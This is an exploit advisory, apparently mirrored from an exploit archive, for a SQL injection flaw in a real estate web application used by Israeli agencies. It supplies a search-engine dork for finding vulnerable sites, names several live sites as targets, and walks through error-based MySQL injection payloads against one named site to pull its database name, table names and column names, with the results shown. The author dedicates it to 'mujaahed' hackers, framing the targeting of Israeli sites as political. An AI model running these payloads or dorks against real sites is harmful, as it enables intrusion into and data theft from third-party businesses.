===================================================================
Real Estate Broker(in ISRAEL) <= Remote SQL Injection Vulnerability
===================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm KnocKout member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[+] Say : Turkish Hackers gift all mujaahed and muslim .
[+] tnX: DaiMon,BARCOD3 and ALL Mujaahed and MUSLIM HACKERS.
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Real Estate Broker
~Version : in ISRAEL
~Software: http://www.bmby.com
~Vulnerability Style : SQL Injection
[MysqL error based method.]
~Vulnerability Dir : /english
~ Very good Google dork.. 27 pages (:
GOOGLE DORK(*) : http://www.google.com.tr/webhp?hl=tr#q=%22Powered+by+Israel+Real+Estate%09Real+Estate+in+Israel%09++%D7%93%D7%99%D7%A8%D7%95%D7%AA+%D7%9C%D7%9E%D7%9B%D7%99%D7%A8%D7%94,%D7%93%D7%99%D7%A8%D7%95%D7%AA+%D7%9C%D7%94%D7%A9%D7%9B%D7%A8%D7%94%09%D7%A0%D7%93%D7%9C%22%D7%9F,+%D7%93%D7%99%D7%A8%D7%95%D7%AA+%D7%95%D7%91%D7%AA%D7%99%D7%9D+-+%D7%9C%D7%92%D7%95%D7%A8+%D7%9E%D7%A7%D7%91%D7%95%D7%A6%D7%AA+BMBY+%E2%80%93+%D7%AA%D7%95%D7%9B%D7%A0%D7%95%D7%AA+%D7%A0%D7%93%D7%9C%22%D7%9F+%D7%95%D7%AA%D7%99%D7%95%D7%95%D7%9A&hl=tr&biw=1280&bih=813&ei=dNS6TOzzDM_CswaZ5bDBDQ&start=180&sa=N&fp=b40cca3bdcb93a9a
[~]Date : "17.10.2010"
-----------
Demos :
http://eretz-hacarmel.co.il/english/
http://www.prime-agency.com/english/
http://www.goldrealestate.co.il/english/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
http://VICTIM/Path/english/search.php?opr=realtor&id=1 { SQL Injection }
http://VICTIM/Path/english/search.php?opr=realtor&id=1 and 1=1
-------------------------------------
START! example : www.homeisrael.com
[~] SQL Injecting(Db Name Get..)
http://www.homesisrael.com/english/search.php?opr=realtor&id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[~]MysqL Error : Duplicate entry '~'lg'~1' for key 1
[+]Database Name is found "lg"
----------------------------------
[~] SQL Injecting(Table Numbers.)
[+] Hexing.. (lg) = 0x6C67 [OK]
http://www.homesisrael.com/english/search.php?opr=realtor&id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0x6C67)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[~]MysqL Error : Duplicate entry '~'183'~1' for key 1
[+] Table Numbers is found "183"
--------------------------------
[~] SQL Injecting(limit <= using for Table names..)
[+] Hexing.. (lg) = 0x6C67 [OK]
http://www.homesisrael.com/english/search.php?opr=realtor&id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x6C67 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
you use limit 0,1))
you use limit 1,1))
you use limit 2,1))
.. too 183 limited Tables names..
[+] Table Names [OK]
--------------------------------
[~] SQL Injecting(limit <= using for column numbers.)
[~] Hexing.. (lg)=0x6C67 and (Table name).. <= use limit.. {Example: anglo_users=616E676C6F5F7573657273}
http://www.homesisrael.com/english/search.php?opr=realtor&id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x6C67 AND table_name=0x616E676C6F5F7573657273 limit 0,1)) from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[~] MysqL Error : Duplicate entry '~'id'~1' for key 1
you use limit 0,1))
you use limit 1,1))
you use limit 2,1))
.. too limited column names..
[+] Column Names [OK]
--------------------------------------
================================
GoodLUCK
# 0day.today [2018-04-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation